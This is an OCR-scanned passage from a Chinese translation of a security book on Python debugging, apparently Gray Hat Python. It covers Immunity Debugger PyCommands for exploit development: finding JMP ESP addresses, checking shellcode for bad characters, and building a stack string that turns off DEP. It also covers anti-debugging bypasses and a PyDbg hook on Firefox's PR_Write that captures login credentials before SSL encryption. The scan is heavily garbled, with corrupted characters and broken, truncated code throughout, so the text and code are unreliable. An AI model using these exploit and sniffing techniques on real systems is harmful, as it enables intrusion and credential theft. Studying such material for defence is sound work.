成 的 python 列表 ) 。 另 一 个 必 备 条 件 是 在 画 数 执行 完成 的 时 候 必 须 返 回 一 个 字符 
串 ， 最 后 更 新 在 调试 器 主 界面 的 状态 栏 。 执 行 命令 之 前 必须 在 命令 前 加 一 个 感叹 


ra 


Fo 


!<scriptname> 


5.2.2 PyHooks 
Immunity 调试 器 包含 了 13 总 不 同类 型 的 hook。 每 一 种 hook 都 能 单独 实现 ， 或 者 
Bx A. PyCommand。 

BpHook/LogBpHook 


当 一 个 断 点 被 触发 的 时 候 ， 这 种 hook 就 会 被 调用 。 两 个 hook 很 相似 ， 除 了 
BpHook 被 触发 的 时 候 ， 会 停止 被 调试 的 进程 ， 而 LogBpHook 不 会 停止 被 调试 的 
进程 。 


AllExceptHook 
所 有 的 异常 的 都 会 触发 这 个 hook, 
PostAnalysisHook 


在 一 个 模块 被 分 析 完 成 的 时 候 ， 这 种 hook 就 会 被 触发 。 这 非常 有 用 ， 当 你 在 在 模 
块 分 析 完 成 后 需要 进一步 进行 静态 分 析 的 时 候 。 记 住 ， 在 用 immlib 对 一 个 模块 进 
行 阔 数 和 基础 块 的 解码 之 前 必须 先 分 析 这 个 模块 。 


AccessViolationHook 

这 个 hook 由 访问 违例 触发 。 常 用 于 在 fuzz 的 时 候 自动 化 捕捉 信息 。 
LoadDLLHook/UnloadDLLHook 

当 一 个 DLL 被 加 载 或 者 卸载 的 时 候 触发 。 
CreateThreadHook/ExitThreadHook 

当 一 个 新 线程 创建 或 者 销毁 的 时 候 触发 。 
CreateProcessHook/ExitProcessHook 

当 目标 进程 开始 或 者 结束 的 时 候 触发 。 
FastLogHook/STDCALLFastLogHook 


这 两 种 hook 利用 一 个 汇编 跳 转 ， 将 执行 权限 转移 到 一 段 hook 代码 用 以 记录 特定 
的 寄存 A AAA. 4A NI FB ek Fh hook 非常 有 用 ; 第 六 章 
将 详细 讲解 。 


以 下 的 LogBpHook 例子 代码 块 能 够 作为 PyHook 的 模板 。 


from immlib import * 
class MyHook( LogBpHook ): 
def init ( self ): 
LogBpHook. init ( self ) 
def run( regs ): 
# Executed when hook gets triggered 


我 们 重 载 了 LogBpHook 类 ， 并 且 建 立 了 run) (必须 ) 。 当 hook 被 触发 的 时 
候 ， 所 有 的 CPU 寄存 器 ， 以 及 指 今 都 将 被 存 人 regs， 此 时 我 们 就 可 以 修改 它们 
J. regs 是 一 个 字 典 ， 如 下 访问 相应 寄存 器 的 值 : 


regs["ESP"] 


hook 可 以 定义 在 PyCommand 里 ， 随 时 调用 。 也 可 以 写成 脚本 放 和 人 PyHooks El 
X. & RAH Immunity 都 会 制 动 加 载 这 些 目 录 。 接 下 来 看 些 实例 。 


5.3 Exploit 开发 


发 现 漏洞 只 是 一 个 开始 ， 在 你 完成 利用 程序 之 前 ， 还 有 很 长 的 一 段 路 要 走 。 不 过 
Immunity 专门 为 了 这 项 任务 做 了 许多 专门 的 设计 ， 相 信和 能 帮 你 减少 不 少 的 痛苦 。 接 
下 来 我 们 要 开发 一 些 PyCommands 以 加 速 exploit 的 开发 。 这 些 PyCommands 要 
完成 的 功能 包括 ， 找到 特定 的 指令 将 执行 权限 转移 到 shellcode， 当 编码 shellcode 
的 时 候 判 断 是 否 有 需要 过 滤 的 有 害 字 符 。 我 们 还 将 用 PyCommand 命 

兮 findantidep Z&11 DEP (软件 执行 保护 ) 。 


5.3.1 找 出 友好 的 利用 指令 


在 获得 EIP 的 控制 权 之 后 ， 你 就 要 将 执行 权限 转移 到 shellcode。 典 型 的 方式 就 
是 ， 你 用 一 个 寄存 器 指向 你 的 shellcode。 你 的 工作 就 是 在 可 执行 的 代码 里 或 者 在 
加 载 的 模块 里 找到 跳 转 到 寄存 器 的 代码 。 Immunity 提供 的 搜索 接口 使 这 项 工作 变 
得 很 简单 ， 它 将 员 穿 整个 程序 寻找 需要 的 代码 。 接 下 来 就 试验 下 。 


# findinstruction.py 
from immlib import * 
def main(args): 
imm - Debugger() 
search code = " ",join(args) 
search bytes - imm.Assemble( search code ) 
search results - imm.Search( search bytes ) 
for hit in search results: 
# Retrieve the memory page where this hit exists 
4 and make sure it's executable 
code page - imm.getMemoryPagebyAddress( hit ) 
access - code page.getAccess( human - True ) 
if "execute" in access.lower(): 
imm.log( "[*] Found: %s (0x%08x)" % ( search code, hit ), é 
return "[*] Finished searching for instructions, check the Log 


[T 
我 们 先 转化 要 搜索 的 代码 《记得 内 存 中 可 是 没有 汇编 指令 的 ) ， 然 后 通过 Search() 
方法 在 整个 程序 的 内 存 空 间 中 包含 这 个 指令 的 地 址 。 在 返回 的 地 址 列表 中 ， 找 到 每 


个 地 址 所 属 的 页 。 接 着 确认 页 面 是 可 执行 的 。 每 找到 一 个 符合 上 面条 件 的 就 打印 到 
记录 窗口 。 在 调试 器 的 命令 栏 里 执行 如 下 格式 的 命令 。 





Ifindinstruction «instruction to search for» 


脚本 运行 后 输入 以 下 测试 参数 ， 


!findinstruction jmp esp 








[*] Finished searching for instructions, check the Log window. 


图 5-2 lfindinstruction PyCommand 的 输出 


现在 我 们 已 经 有 了 一 个 地 址 列表 ， 这 些 地 址 都 能 使 我 们 的 shellcode 运行 起 来 (前 
提 你 的 shellcode 地 址 放 在 ESP 中 ) 。 每 个 利用 程序 都 有 些许 差别 ， 但 我 们 现在 
已 经 有 了 一 个 能 够 快 输 寻 找 指令 地 址 的 工具 ， 很 好 很 强大 。 


5.3.2 过 滤 有 害 字 符 


当 你 发 送 一 段 漏洞 利用 代码 到 目标 系统 ， 由 于 字符 的 关系 ，shellcode 也 许 没 办 法 
执行 。 举 个 例子 ， 如 果 我 们 从 一 个 strcpy() 调 用 中 发 现 了 缓冲 区 浴 出 ， 我 们 的 利用 
代码 就 不 能 包含 NULL F 符 (0x00). 因 为 strcpy() — 过 到 NULL 字 符 就 会 停止 拷贝 
数据 。 因 此 ， 就 需要 将 shellcode 编码 ， 在 目标 内 存 执行 后 再 解码 。 然 而 ， 始 终 有 
各 种 原因 导致 exploit 编写 失败 。 比 如 程序 中 有 多 重 的 字符 编码 ， 或 者 被 漏洞 程序 
TT SPB SIRE, ix RA SAGT. 


一 般 情况 下 ， 如 果 你 获得 了 EIP 的 控制 权限 ， 然 后 shellcode 抛 出 访问 为 例 或 者 
crash E 标 ， 接 着 完成 自己 的 伟大 使 命 〈 反 弹 后 门 ， 转 到 另 一 个 进程 继续 破坏 ， 别 
的 你 能 想得到 的 脏 活 累 活 ) 。 在 这 之 前 ， 最 重要 的 事 就 是 确认 shellcode 被 准确 的 
复制 到 内 存 。Immunity 使 的 这 项 工作 更 容易 。 图 5-3 显示 了 浴 出 之 后 的 堆栈 。 
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Figure 5-3: AH JA Immunity RAO 


如 你 所 见 ，EIP 当前 的 值 和 ESP 的 一 样 。4 个 字 节 的 OxCC 将 使 调试 器 简单 的 停止 
IF, 就 像 设 置 了 在 这 里 设置 了 断 点 ( 0xCC 和 INT3 的 指 邻 一 样 ) 。 紧 接着 4 个 
INT3 #83, T£ ESP+0x4 是 shellcode 的 开始 。 我 们 闻 shellcode 进行 简单 的 
ASCII 编码 ， 然 后 一 个 字 节 一 个 字 节 的 比较 内 存 中 的 shellcode 和 我 们 发 送 
shellcode 有 无 差别 ， 如 果 有 一 个 字符 不 一 样 ， 说 明 它 没有 通过 软件 的 过 滤 。 在 之 
后 的 攻击 总 就 必须 将 这 个 有 害 的 字符 加 入 shellcode 编码 中 。 


你 能 够 从 CANVAS，Metasploit, 或 者 你 自己 的 制造 的 shellcode。 新 建 badchar.py 
文件 ， 输入 以 下 代码 。 


Zbadchar .py 
from immlib import * 
def main(args): 
imm = Debugger () 
bad_char_found = False 
# First argument is the address to begin our search 
address = int(args[0], 16) 
# Shellcode to verify 
shellcode = "<<COPY AND PASTE YOUR SHELLCODE HERE>>" 
shellcode_length = len(shellcode) 
debug shellcode = imm.readMemory( address, shellcode length ) « 
imm.log("Address: 0x9608x" % address) 
imm.log("Shellcode Length : 96d" 9?6 length) 
imm.log("Attack Shellcode: %s" 96 canvas shellcode[:512]) 
imm.log("In Memory Shellcode: %s" % id shellcode[:512]) 
# Begin a byte-by-byte comparison of the two shellcode buffers 


count = 0 
while count «- shellcode length: 
if debug shellcode[count] !- shellcode[count]: 


imm.log("Bad Char Detected at offset %d" 96 count) 
bad char found - True 
break 
count += 1 
if bad char found: 
imm.log("[***** | |] iE) 
imm.log("Bad character found: %s" % debug shellcode[count]: 
imm.log("Bad character original: %s" % shellcode[count]) 
imm.log("[***** | |] Ds) 
return "[*] !badchar finished, check Log window." 


E B m 


TERT Blas, 我 们 只 是 从 Immunity 库 中 调用 了 readMemory()Eg Zi, $I FESHI 
只 是 简单 的 字符 串 比 较 。 现 在 你 需要 将 你 的 shellcode ik ASCII 编码 (如 果 你 有 字 
节 OxEB 0x09, 编码 后 后 你 的 字符 串 将 看 着 像 EB09) ， 将 代码 贴 和 脚本， 并 且 如 
下 运行 





!badchar «Address to Begin Search» 


在 我 们 前 面 的 例子 中 ， 我 们 将 从 ESP+0x4 地 址 (OXOOAEFDAC) 寻找 ， 所 以 要 在 
PyCommand 执行 如 下 命令 : 


!Ibadchar OxOOAEFDAC 


我 们 的 脚本 在 发 现 危 险 字 符 串 的 时 候 将 立刻 发 出 警戒 ， 由 此 大 大 减少 花 在 调试 
shellcode 崩溃 时 间 。 


5.3.3 2:31 windows 的 DEP 


DEP 是 一 种 在 windows(XP SP2, 2003, Vista) 下 实现 的 的 安全 保护 机 制 ， 用 来 防止 
代码 在 栈 或 者 堆 上 执行 。 这 能 阻止 非常 多 的 漏洞 利用 代码 运行 ， 因 为 大 多 的 
exploit 都 会 把 shellcode 放 在 堆栈 上 。 然 而 有 一 个 技巧 能 巧妙 的 绕 过 DEP， 利 用 微 
软 未 公布 的 API 函数 NtSetlnformationProcess()。 它 能 够 阻止 进程 的 DEP 保护 ， 
将 程序 的 执行 权限 转移 到 shellcode, Immunity 调试 器 提供 了 一 个 PyCommand 
命令 findantidep.py 能 够 很 容易 找到 DEP 的 地 址 。 eri 看 这 个 very very 
nice 的 函数 。 


NTSTATUS NtSetInformationProcess( 
IN HANDLE hProcessHandle, 
IN PROCESS INFORMATION CLASS ProcessInformationClass, 
IN PVOID ProcessInformation, 
IN ULONG ProcessInformationLength 


): 


为 了 使 进程 的 DEP 保护 失效 ， 需 要 将 NtSetlnformationProcess()B 
ProcesslnformationClass 函数 设置 成 ProcessExecuteFlags (0x22)， 将 
ProcessInformation 参数 设置 MEM EXECUTE OPTION ENABLE (0x2), 问题 
是 在 shellcode 中 调用 ETERN 现 NULL 字符 。 解 决 的 方法 是 找到 一 个 正常 
调用 了 NtSetinformationProcess() 的 函数 ， 再 将 我 们 的 shellcode $2 W $l3x SR 

已 经 有 一 个 已 知 的 点 就 在 ntdll.dll 里 。 使 用 Immunity 反 汇 编 ntdll.dll 找 出 这 个 
地 址 。 


7C91D3F8 . 3C 01 CMP AL,1 

7C91D3FA . 6A 02 PUSH 2 

7C91D3FC . 5E POP ESI 

7C91D3FD . OF84 B72A0200 JE ntdll.7C93FEBA 


7C93FEBA > 8975 FC MOV DWORD PTR SS:[EBP-4], ESI 


7C93FEBD .^E9 41D5FDFF JMP ntdll.7C91D403 

7C91D403 > 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 

7C91D407 . OF85 60890100 JNZ ntdll.7C935D6D 

7C935D6D 6A 04 PUSH 4 

7C935D6F . 8D45 FC LEA EAX, DWORD PTR SS: [EBP-4] 

7C935D72 . 50 PUSH EAX 

7C935D73 . 6A 22 PUSH 22 

7C935D75 . 6A FF PUSH -1 

7C935D77 . E8 B188FDFF CALL ntdll.ZwSetlInformationProcess 


上 面 的 代码 就 是 调用 NtSetinformationProces 的 必要 过 程 。 首 先 比 较 ALD 1, 4E 


2 弹 入 ESI, 
4 (记得 ESI 始终 是 2) , 
4 的 值 非 需 。 JE Bese 到 0x7C935D6D。 从 这 里 开始 变 得 有 趣 ，4 被 第 一 个 压 人 
栈 ，EBP-4 (始终 是 2!1) 被 加 载 进 EAX, 


紧 接 着 是 条 件 跳 转 到 0x7C93FEBA。 在 这 里 将 ESI 拷贝 进 栈 EBP- 


接着 非 条 件 跳 转 到 7C91D403。 在 这 里 将 确认 堆栈 EBP- 
然后 压 人 栈 ， 接 着 0x22 被 压 人 ， 最 后 -1 


REA (-1 表示 禁止 当前 进程 的 DEP) 。 剩 下 调用 
ZwSetlnformationProcess (NtSetlnformationProcess 的 别称 ) 。 上 面 的 代码 完成 
的 功能 相当 于 下 面 的 函数 调用 : 


NtSetInformationProcess( -1, 0x22, 0x2, 0x4 ) 


Perfect ! 这 样 进程 的 DEP 就 被 取消 了 。 在 这 之 前 有 两 项 是 必须 注意 的 。 第 一 
exploit 代 码 得 和 地 址 Ox7C91D3F8 结合 。 第 二 执行 到 0x7C91D3F8 之 前 ， 确 保 
AL 设置 成 1. 一 旦 满足 了 这 些 条 件 ， 我 们 就 能 通过 JMP ESP 将 控制 权 转 移 给 我 们 
的 shellcode。 现 在 回顾 三 个 必 须 的 地 址 : 


一 个 地 址 将 AL 设置 成 1 然后 返回 。 一 个 地 址 作为 一 连 串 反 DEP 代码 的 首 地 址 。 
一 个 地 址 将 执行 权限 返回 到 我 们 shellcode 


在 平常 你 需要 手工 的 获取 这 些 地 址 ， 不 过 Immunity 提供 了 findantidep.py 辅助 我 们 
完成 这 项 。 最 后 你 将 得 到 一 个 exploit 字符 串 ， 将 它 与 你 自己 的 exploit 结合 ， 就 
能 够 使 用 了 。 接 下 来 看 看 findantidep.py 代码 ， 接 下 来 将 会 使 用 它 进行 测试 。 


# findantidep.py 
import immlib 
import immutils 
def tAddr(addr): 
buf = immutils.int2str32 swapped(addr) 
return "\\x%02x\\x%02X\\x%02X\\x%02x" % ( ord(buf[0]) , 
ord(buf[1]), ord(buf[2]), ord(buf[3]) ) 
DESC-"""Find address to bypass software DEP""" 
def main(args): 
imm-immlib.Debugger() 
addylist - [] 
mod = imm.getModule("ntdll.dll") 
if not mod: 
return "Error: Ntdll.dll not found!" 
# Finding the First ADDRESS ret = imm.searchCommands("MOV AL, 1° 
if not ret: 
return "Error: Sorry, the first addy cannot be found" 
for a in ret: 
addylist.append( "0x9608x: %s" % (a[0], a[2]) ) 
ret = imm.comboBox("Please, choose the First Address [sets AL 1 
firstaddy - int(ret[0:10], 16) 
imm.Log("First Address: 0x%08x" % firstaddy, address = firstad 
# Finding the Second ADDRESS ret = imm.searchCommandsOnModule( 
POP ESI\n" ) 
if not ret: 
return "Error: Sorry, the second addy cannot be found" 
secondaddy = ret[0][0] 
imm.Log( "Second Address 9x" % secondaddy , address- secondadd\ 
# Finding the Third ADDRESS ret = imm.inputBox("Insert the Asm 
ret = imm.searchCommands(ret ) 
if not ret: 
return "Error: Sorry, the third address cannot be found" 
addylist - [] 
for a in ret: 
addylist.append( "0x9608x: %s" % (a[0], a[2]) ) 
ret - imm.comboBox("Please, choose the Third return Address [jt 
thirdaddy - int(ret[0:10], 16) 
imm.Log( "Third Address: 0x9608x" 96 thirdaddy, thirdaddy ) 
imm.Log( 'stack = "%s\\xff\\xff\\xff\\xff%s\\xff\\xff\\xff\\xf1 
( tAddr(firstaddy), tAddr(secondaddy), tAddr(thirdaddy) ) ` 


| —————————————( 


首先 寻找 指令 "MOV AL,TWnRET", 然 后 在 地 址 列表 中 选择 一 个 。 接 着 在 ntdll.dll BH 
Sa DEP 代码 。 第 三 步 寻 找 将 执行 权限 转移 给 shellcode 的 代码 ， 这 个 代码 有 用 户 
输入 ， 最 后 在 结果 中 挑 一 个 。 结 果 答 应 在 Log 窗口 。 图 5-4 到 5-6 就 是 整个 流 


程 。 





Please, choose the First Address [sets AL Eo 1] x| 








Cancel | 
Figure 5-4: 第 一 步 ， 选 择 一 个 地 址 ， 并 设置 AL 为 1 
x 
JMP ESP 
Cancel | 


Figure 5-5: 输 入 需要 搜索 的 指 兮 





Please, choose the Third return Address [jump 





0x6f8a5e1 a: C:SwINDOWwS*&ppPatchs&cGenral.DLL. 





Figure 5-6: 选择 一 个 返回 地 址 
后 看 到 的 输出 i 结果 如 下 : 


stack = "\x75\x24\x01\x01\xff\xff\xff\xff\x56\x31\x91\x7c\xff\xff\) 


El S CERE [s 





was shellcdoe 组 合 之 后 ， 你 就 能 将 exploit 移植 到 具有 上 反 DEP 的 
系统 。 现在 只 要 用 简单 的 Python 脚本 就 能 在 很 短 的 时 间 内 开发 出 稳定 的 exploit, 
ERAJ 小 时 苦 苦 寻找 地 址 ， 最 后 花 30 秒 试验 。 接 下 来 学 习 如 何 用 immlib 


绕 过 病毒 的 一 般 的 反 调试 机 制 。 


5.4 搞定 反 调试 机 制 


现在 的 病毒 是 越 来 越 狭 独 了 ， 无 论 是 在 感染 ， 传 播 还 是 在 反 分 析 方 面 。 一 方面 ， 将 
代码 打包 或 者 加 密 代 码 使 代码 模糊 化 ， 另 一 个 方面 使 用 反 调 试 机 制 ， 郁 问 调 试 者 。 
接 下 来 我 们 将 了 解 常用 反 调试 机 制 ， 并 用 Immunity 调试 器 和 Python 创造 自己 的 
脚本 绕 过 反 调试 机 制 。 


5.4.1 IsDebuggerPresent 


现在 最 常用 的 反 调试 机 制 就 是 用 IsDebuggerPresent (由 kernel32. 导 出 ) . KAT 
需要 参数 ， Lu CRM ti 到 当前 进程 ， 就 返回 1， 否 则 返回 0. 如 果 我 们 反 
汇编 这 个 图 


7C813093 &gt;/$ 64:A1 18000000 MOV EAX,DWORD PTR FS:[18] 
7C813099 &#124;. 8B40 30 MOV EAX,DWORD PTR DS: [EAX+30] 
7C81309C &#124;. OFB640 02 MOVZX EAX,BYTE PTR DS: [EAX+2] 
7C8130A0 \. C3 RETN 


代码 通过 不 断 的 寻 址 找到 能 证 明 进 程 被 调试 的 数据 位 ， 第 一 行 ， 通 过 FS 寄存 器 的 
第 0x18 位 找到 TIB (线程 信息 UR) 的 地 址 。 第 二 行 通过 TIB 的 第 0x30 位 找到 
PEB( 进 程 环境 信息 块 ) 的 地 址 。 第 三 行将 PEB 的 0x2 位 置 上 的 BeingDebugged = 
量 存在 EAX 寄存 器 中 ， 如 果 有 调 试 器 附加 到 进程 ， 该 值 为 0x1. Damian Gomez 
提供 了 一 个 简单 的 方式 绕 过 IsDebuggerPresent， 可 以 很 方便 的 在 Immunity 执 
行 ， 或 者 在 PyCommand 中 调用 。 


imm.writeMemory( imm.getPEBaddress() + 0x2, "\x00" ) 


上 面 的 代码 将 PEB 的 BeingDebugged 标志 就 当 的 设置 成 0. 现 在 病毒 无 法 使 用 
IsDebuggerPresent 来 判断 了 调试 器 了 ， 它 傻 了 。 


5.4.2 解决 进程 枚 举 


病毒 会 测试 枚 举 所 有 运行 的 进程 以 确认 是 否 有 调试 器 在 运行 。 举 个 例子 ， 如 果 你 正 

在 用 Immunity 调试 一 个 病毒 ， 就 会 注册 一 E ImmunityDebugger.exe 的 进 

程 。 病 毒 通 过 用 Process32First 查找 第 一 个 注册 的 进程 ， 接 着 用 Mus 

循环 获取 剩 下 的 进程 。 这 两 个 而 数 调用 会 返回 一 个 布尔 值 ， 告 诉 调 用 者 函数 是 否 

行 成 功 。 我 们 重要 将 函数 的 返回 值 ( 存 储 在 EAX 寄存 器 中 ) ， 就 当 的 设置 为 0 u 
能 够 欺骗 那些 调用 者 了 。 代 码 如 下 : 


process32first = imm.getAddress("kernel32.Process32FirstW") 
process32next = imm.getAddress("kernel32.Process32NextW") 
function list = [ process32first, process32next ] 
patch bytes = imm.Assemble( "SUB EAX, EAX\nRET" ) 
for address in function list: 
opcode - imm.disasmForward( address, nlines - 10 ) 
imm.writeMemory( opcode.address, patch bytes ) 


首先 获取 两 个 函数 的 地 址 ， 将 它们 放 到 列表 中 。 然 后 将 一 段 补 丁 代码 汇编 成 操作 
码 ， 代 码 将 EAX 设置 成 0， 然 后 返回 。 接 下 来 反 汇 编 Process32First 和 
Process32Next HASTIT 的 代码 。 这 样 做 的 目的 就 是 一 些 高 级 的 病毒 会 确认 画 数 
的 头 部 是 否 被 修改 过 。 我 们 在 第 10 行 再 写 入 补丁 ， 就 能 瞒天过海 了 。 然 后 简单 的 将 
我 们 的 补丁 代码 写 入 第 10 行 ， 现 在 无 论 怎 么 调用 两 个 函数 都 会 返回 失败 。 


我 们 通过 两 个 例子 讲解 了 如 何 使 用 Python 和 Immunity 调试 器 ， 使 病毒 无 法 发 现 我 
们 。 越 来 越 多 的 的 反 调 试 技术 将 在 病毒 中 使 用 ， 对 付 他 们 的 方法 也 不 会 完结 。 但 是 
Immunity 无 疑 将 会 成 为 你 对 付 病 毒 或 者 开发 exploit 的 利器 。 


接 下 来 看 看 在 逆向 工程 中 的 hooking 技术 。 


6 HOOKING 


Hooking 是 一 种 强大 的 进程 监控 (process-observation)$X 术 , 通 过 改变 进程 的 流程 ， 
以 监视 进程 中 数据 的 访问 和 改变 。 Hooking AF reg rootkits, BAe, 
还 有 调试 工作 。 在 逆向 调试 中 ， 通 过 构建 简单 的 hook 检索 我 们 需要 的 信息 ， 能 够 
节省 很 多 手工 操作 的 时 间 。hook， 简 单 而 强大 。 


在 Windows 系统 中 ， 有 非常 多 的 方法 实现 hook。 我 们 主要 介绍 两 种 : soft hook 和 
hard hook, soft hook 就 是 在 要 附加 的 目标 进程 中 ， 插 入 INT3 中 断 ， 接 管 进程 的 
执行 流程 。 这 和 58 夜 的 “扩展 断 点 处 理 " 很 像 。hard hook 则 是 在 目标 进程 中 硬 编码 ( 
hard-coding) 一 个 跳 转 到 hook 代码 (用 汇编 代码 编写 )。 Soft hook 在 频繁 的 函数 调 
用 中 很 有 用 。 然 而 ， 为 了 对 目标 进程 产生 最 小 的 影响 就 必须 用 到 hard 
hook 。 有 两 种 主要 的 hardhook， 分 别 是 heap-management routines 和 
intensive file I/O operations. 


我 们 在 前 面 介绍 的 工具 实现 hook, Fd PyDbg 实现 soft hook 用 于 嗅 探 加 密 的 网 络 
传输 。 用 Immunity 实现 hard hook 做 一 些 高 效 的 heap instrumentation。 


6.1 FH PyDbg 实现 Soft Hooking 


第 一 个 例子 就 是 在 应 用 层 嗅 探 加 密 的 网 络 传输 。 平 时 为 了 明白 客户 端 和 服务 器 之 间 
的 工 作 流程 ， 我 们 都 会 使 用 一 个 网 络 分 析 器 列 如 Wireshark, 很 不 幸 的 是 ， 
Wireshark 获得 的 数据 经 常 都 是 加 密 过 的 ， 使 得 协议 分 析 变 得 模糊 。 用 soft 
hooking 你 能 够 在 数据 加 密 前 或 者 接受 并 解密 后 捕获 它们 。 


实验 目标 就 是 最 流行 的 开源 浏览 器 Mozilla Firefox。 为 了 这 次 实验 ， 我 们 假设 
Firefox 是 闭 源 的 (否则 会 相当 没 趣 ) 。 我 们 的 任务 就 是 在 firefox.exe 进程 加 密 数 
据 前 嗅 探 出 数据 。 现在 最 通用 的 网 络 加 密 协议 就 是 SSL， 这 次 的 主要 目标 就 是 解 
决 她 。 


为 了 跟踪 函数 的 调用 〈 未 加 密 数 据 的 传递 ) ， 需 要 使 用 记录 模块 间 调 用 的 技巧 
http://forum.immunityinc.com/index.php?topic=35.0 )。 现 在 首要 解决 的 问题 就 是 在 
什么 地 方 设置 hook。 我 们 先 假定 将 hook 设置 在 PR. Write 函数 上 (由 nspr4.dil. 
导出 ) 。 当 这 个 函数 被 TAN, HEAL ESP + 8 ] 指 向 ASCII 字符 串 (GARN 
提交 的 但 未 加 密 的 数据 ) 。 ESP + 8 说 明 它 是 PR_Write 的 第 二 个 函数 ， 也 是 我 们 
需要 的 ， 记 录 它 ， 恢 复 程序 。 

首先 打开 Firefox, AMH https://www.openrce.org/。 一 旦 你 接收 了 SSI 证书， 

页 面 就 加 载 成 功 。 接 着 Immunity 附加 到 firefox.exe 进程 在 nspr4.PR Write 设置 
Brea, TE OpenRCE 网 站 右上 角 有 一 个 登录 窗口 ， 设 置 用 户 名 为 test 和 密码 test, 
点 击 Login 按钮 。 设 置 的 断 点 立刻 被 触发 ; 再 按 F9， 断 点 再 次 触发 。 最 后 ， 你 将 
在 栈 看 到 如 下 的 内 容 : 


[ESP + 8] => ASCII "username-test&password-test&remember me-on" 


很 好 ， 我 们 很 清晰 的 看 到 了 用 户 名 和 密码 。 但 是 如 果 从 网 络 层 看 传输 的 数据 ， 将 是 
一 堆 经 过 SSL 加 密 的 无 意义 的 数据 。 这 种 方法 不 仅 对 OpenRCE 有 效 。 当 你 浏览 
任何 一 个 需要 传 输 敏 感 数 据 的 网 站 的 时 候 ， 这 些 数据 都 将 很 容易 的 被 捕捉 到 。 现 在 
再 也 不 用 手工 操作 调试 器 去 捕捉 了 ， 自 动 化 才 是 王道 。 


在 用 PyDbg 定义 soft hook 之 前 ， 需 要 先 定 义 一 个 包含 说 有 hook 目标 的 容器 。 如 
下 初始 化 容器 : 


hooks = utils.hook container() 


使 用 hook container 类 的 add() 方 法 将 我 们 定义 的 hook HtA. HARE : 


add( pydbg, address, num arguments, func entry hook, func exit hool 


E Mec —— RES 


"| 











第 一 个 参数 设置 成 一 个 有 效 的 pydbg Hts, address 参数 设置 成 要 安装 hook 的 地 
tit, num_arguments 设置 成 传递 给 hook 的 参数 。func_entry_hook 和 

func exit hook 都 是 回调 函数 。 func entry hook 是 hook 被 触发 后 立刻 调用 的 ， 
func exit hook 是 被 hook 的 函数 将 要 退出 之 前 执行 的 。entry hook 用 于 得 到 函数 
的 参数 ，exit hook 用 于 捕捉 函数 的 返回 值 。 


def entry_hook( dbg, args ): 
# Hook code here 
return DBG CONTINUE 


dbg 参数 设置 成 有 效 的 pydbg Ar, args 接收 一 个 列表 ， 包 含 hook 触发 时 接收 到 
的 参 数 。 


exit hook 回调 函数 有 一 点 不 同 就 是 多 了 个 ret 参数 ， 包 含 了 画 数 的 返回 值 (EAX 的 
值 ): def exit hook( dbg, args, ret ): 


# Hook code here 
return DBG CONTINUE 


接 下 用 实例 看 看 如 何 用 entry hook 噢 探 加 密 前 的 数据 。 


#firefox_hook.py from pydbg import * 

from pydbg.defines import * 

import utils 

import sys 

dbg - pydbg() 

found firefox - False 

# Let's set a global pattern that we can make the hook 

4 search for 

pattern = "password" 

# This is our entry hook callback function 

# the argument we are interested in is args[1] 

def ssl sniff( dbg, args ): 
# Now we read out the memory pointed to by the second argument 
4 it is stored as an ASCII string, so we'll loop on a read unt: 
4 we reach a NULL byte buffer - "" 


offset = 0 
while 1: 
byte = dbg.read process memory( args[1] + offset, 1 ) 
if byte !- "XxQo": 
buffer += byte offset += 1 continue 
else: 
break 


if pattern in buffer: 
print "Pre-Encrypted: %s" 96 buffer 
return DBG CONTINUE 
# Quick and dirty process enumeration to find firefox.exe 
for (pid, name) in dbg.enumerate processes(): 
if name.lower() == "firefox.exe": 
found firefox - True 
hooks - utils.hook container() dbg.attach(pid) 
print "[*] Attaching to firefox.exe with PID: 96d" % pid 
# Resolve the function address 
hook address = dbg.func resolve debuggee("nspr4.dll","PR WI 
if hook address: 
# Add the hook to the container. We aren't interested 
4 in using an exit callback, so we set it to None. 
hooks.add( dbg, hook address, 2, ssl sniff, None ) 
print "[*] nspr4.PR Write hooked at: 0x9608x" % hook adt 
break 
else: 
print "[*] Error: Couldn't resolve hook address." 
sys.exit(-1) 
if found firefox: 
print "[*] Hooks set, continuing process." 
dbg.run() 
else: 
print "[*] Error: Couldn't find the firefox.exe process." 
sys.exit(-1) 








代码 简洁 明了 :在 PR. Write 上 设置 hook, “4 hook 被 触发 的 时 候 ， 我 们 尝试 读 出 第 
二 个 参数 指向 的 字符 串 。 如 果 有 符合 的 数据 就 打印 在 命 合 行 。 启 动 一 个 新 的 
Firefox， 接 着 运行 firefox hook.py 脚本 。 重 复 之 前 的 步骤 ， 登 录 
https://www.openrce.org/， 将 看 到 输出 如 下 : 


[*] Attaching to firefox.exe with PID: 1344 

[*] nspr4.PR Write hooked at: 0x601a2760 

[*] Hooks set, continuing process. 

Pre-Encrypted: username-test&password-test&remember me-on 
Pre-Encrypted: username-test&password-test&remember me-on 
Pre-Encrypted: username-jms&password-yeahright!&remember me-on 


Listing 6-1: How cool is that! 我 们 能 看 到 未 加 密 前 的 用 户 名 密码 


我 们 已 经 看 到 了 soft hook 的 轻 量 级 和 强大 能 力 。 这 种 方法 能 被 用 于 所 有 类 型 的 调 
试 和 逆向 过 程 。 在 上 面 的 例子 中 soft hook 的 工作 还 算 正 常 ， 如 果 遇 到 有 性 能 限制 
NNSA, 进程 马上 就 会 变 得 缓慢 ， 行 为 异常 ， 还 可 能 骨 溃 。 只 是 因为 ， 当 
INT3 被 触发 的 时 候 ， 会 将 执行 权限 交 给 我 们 的 hook 代码 之 后 返回 。 这 回 花费 非 
常 多 的 事件 ， 如 果 辑 数 每 秒 钟 执行 数 千 次 。 接 下 来 让 我 们 看 看 如 何 通过 设置 hard 
hook 和 instrument low-level heap routines 以 解决 这 个 问题 。 


6.2 Hard Hooking 


现在 轮 到 有 趣 的 地 方 了 ，hard hooking。 这 种 hook 很 高 级 ， 对 进程 的 影响 也 很 
小 ， 因 为 hook 代码 字 节 写成 了 x86 汇编 代码 。 在 使 用 soft hook 的 时 候 在 断 点 触 
发 的 时 候 有 很 多 事件 发 生 ， 接 着 执行 hook 代码 ， 最 后 恢复 进程 。 使 用 hard hook 
的 时 候 ， 只 要 在 进程 内 部 扩展 一 块 区 域 ， 存 放 hook 代码 ， 跳 转 到 此 区 域 执 行 完成 
后 ， 返 回 正常 的 程序 执行 流程 。 优 点 就 是 ， hard hook 目标 进程 的 时 候 ， 进 程 没 
暂停 ， 不 像 soft hook, 


Immunity 调试 器 提供 了 一 个 简单 的 对 象 FastLogHook 用 来 创建 hard hook. 
FastLogHook 在 需要 hook 的 画 数 里 写 入 跳 转 代码 ， 跳 到 FastLogHook 申请 的 一 
